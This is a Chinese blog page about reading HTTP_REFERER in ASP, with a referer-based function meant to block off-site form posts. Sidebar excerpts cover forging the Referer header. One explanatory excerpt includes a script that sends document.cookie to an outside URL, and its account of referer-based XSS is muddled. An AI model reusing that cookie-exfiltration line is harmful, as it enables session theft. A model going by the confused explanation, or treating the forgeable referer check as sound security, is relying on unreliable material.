asp Http_Referer

最新推荐文章于 2018-06-07 10:07:22 发布
最新推荐文章于 2018-06-07 10:07:22 发布
阅读量745 收藏
点赞数
分类专栏: asp 文章标签: asp Http_Referer
HTTP_Referer最常用的应用就是能够防止外部提交。

下列情况是从浏览器的地址栏正常取得Request.ServerVariables("HTTP_REFERER"):
1) 直接用<a href="">
2) 用Submit或<input type="image">提交的表单(POST或GET)
3) 使用JAvaScript提交的表单(POST或GET)

下面我们再看看Request.ServerVariables("HTTP_REFERER")不能正常取值的情况:
1) 从收藏夹链接
2) 单击主页或自定义的地址
3) 在浏览器中直接输地址
4) 使用JavaScript的Location.href或者是Location.replace()
5) <%Response.Redirect%>
6) <%Response.AddHeader%>或者是<mete http-equiv="refresh">转向

7) 用XML加载地址


function ChkPost()
dim server_v1,server_v2
chkpost=false
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
If Mid(server_v1,8,Len(server_v2))<>server_v2 then
chkpost=False
else
chkpost=True
end If
end function


ruibon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一段ASPHTTP_REFERER判断代码
10-30
其实我这样做的本意是为了防止盗链!大家帮忙看一下通过代码能够根治盗链!
ASP 使用 Request.ServerVariables(HTTP_REFERER) 方法获取请求页面地址的注意事项
技术资料收集站
09-25 4715
我们常使用 Request.ServerVariables(HTTP_REFERER) 方法获得上一个请求页面的地址,用来判断网址来源,并根据来源的不同执行不同的操作。 使用此方法获取请求页面地址虽然简单,但对请求页面通过何种方法链接或转向到本页却有一定的限制,否则在某些浏览器中将无法正确获取网址来源。 下面我们以本页地址为:local.asp 为例进行说明。 一、Request
ASP获取上一页地址的方法(HTTP_REFERER)
Jamie2012的专栏
02-16 2942
If Request.ServerVariables("HTTP_REFERER")    tmpstr=Request.ServerVariables("HTTP_REFERER")    Comeurl=tmpstr Else    Comeurl="index.htm" End If   Response.Write(Comeurl) %> 代码解释:主
ASP实现禁止从外部提交数据
管子(zero)的杂乱空间
08-26 1716
<!--google_ad_client = "pub-4490194096475053";/* 内容页,300x250,第一屏 */google_ad_slot = "3685991503";google_ad_width = 300;google_ad_height = 250;//--><script type="text/javascript"src="
asp Http_Referer,Server_Name和Http_Host
10-30
以前感觉Request.ServerVariables里的值很多,现在看看还是那么多,不过今天谈其中的一个值----HTTP_Referer以及Request.ServerVariables里Server_Name与Http_Host之间有什么区别呢?
ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
10-30
ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
ASP 伪造访问来路 HTTP_REFERER
07-03 6762
 ASP 伪造访问来路 HTTP_REFERERFunction GetBody(weburl)     Set Retrieval = Server.CreateObject("MSXML2.XMLHTTP")     With Retrieval         .Open "Get", weburl, False, "", ""         .setRequestHeader "refe
HTTP_REFERER的用法及伪造
热门推荐
且行且吟
11-13 10万+
引言在php中,可以使用$_SERVER[‘HTTP_REFERER’]来获取HTTP_REFERER信息,关于HTTP_REFERER,php文档中的描述如下: “引导用户代理到当前页的前一页的地址(如果存在)。由 user agent 设置决定。并不是所有的用户代理都会设置该项,有的还提供了修改 HTTP_REFERER 的功能。简言之,该值并不可信。 ” 在百度百科中,对于该参数的描
伪造HTTP-REFERER方法及防止伪造REFERER方法探讨
nutian的专栏
09-04 4113
HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东。以下是伪造方法:ASP:dim http set http=server.createobject("MSXML2.XMLHTTP") //MSXML2.serverXMLHTTP也可以Http.open "GET",url,false Http.setRequestHeader "Referer","h
asp禁止站外提交表单代码,在http升级 https后,验证不能通过的问题?
李远的博客
06-07 1853
http时的代码&lt;% '禁止站外提交表单server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request.ServerVariables("SERVER_NAME")) if mid(server_v1,8,len(server_v2))&lt;&gt;server_v2 then response....
Request.UrlReferrer详解
weixin_34183910的博客
06-12 389
Request.UrlReferrer可以获取客户端上次请求的url的有关信息。  这样我们就可以通过这个属性返回到“上一页”,示例如下     1.      首先在Page_load中获得并储存该信息 Page_load(object obj,EventArgs e)             {                     if(!IsPostBack)            ...
获取http头 的 referrer 信息
sgear
02-23 1750
 ASP。NET 获取 referrer  信息 的方法如下:Request.ServerVariables["HTTP_REFERER"].ToString()  JS  获取   referrer  信息 的方法如下:document.referrer
Referer校验
摩尔__摩尔的博客
10-24 1万+
Referer是http协议中定义的,Referer就是上一个页面的地址,这个是浏览器会在点击一个链接时自动添加到请求头中的查看一个request信息:GET /adjs.php?n=348893119&what=zone:382&charset=utf-8&exclude=,&referer=http%3A//topic.csdn.net/u/20100730/16/fd41a3a3-8976-4
HTTP_REFERER的xss
最新发布
10-13
HTTP_REFERER是HTTP协议中的一个请求头字段,用于标识请求来源页面的URL地址。在Web应用程序中,可以使用HTTP_REFERER来判断请求是否来自可信的来源页面,从而防止跨站点请求伪造(CSRF)攻击。但是,由于HTTP_REFERER可以被伪造,因此在某些情况下,攻击者可以利用HTTP_REFERER来进行XSS攻击。 具体来说,攻击者可以通过构造恶意页面,在其中注入一段JavaScript代码,并将该页面的URL地址设置为目标网站的URL地址。当用户访问恶意页面后,浏览器会将目标网站的URL地址作为HTTP_REFERER发送给目标网站服务器。如果目标网站没有对HTTP_REFERER进行有效的过滤和验证,那么攻击者就可以利用HTTP_REFERER来执行XSS攻击。 例如,攻击者可以在恶意页面中注入以下代码: ```javascript <script> var img = new Image(); img.src = "http://www.target.com/submit?data=" + document.cookie; </script> ``` 当用户访问恶意页面后,浏览器会将目标网站的URL地址作为HTTP_REFERER发送给目标网站服务器。如果目标网站没有对HTTP_REFERER进行有效的过滤和验证,那么攻击者就可以在目标网站上执行上述JavaScript代码,从而窃取用户的Cookie信息。 为了防止HTTP_REFERER的XSS攻击,Web应用程序可以采取以下措施: 1. 对HTTP_REFERER进行有效的过滤和验证,只允许来自可信的来源页面的请求通过; 2. 在HTTP响应头中设置Referrer-Policy,指定HTTP_REFERER的发送策略; 3. 在Web应用程序中使用CSRF Token等技术来防止CSRF攻击,从而减少HTTP_REFERER的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值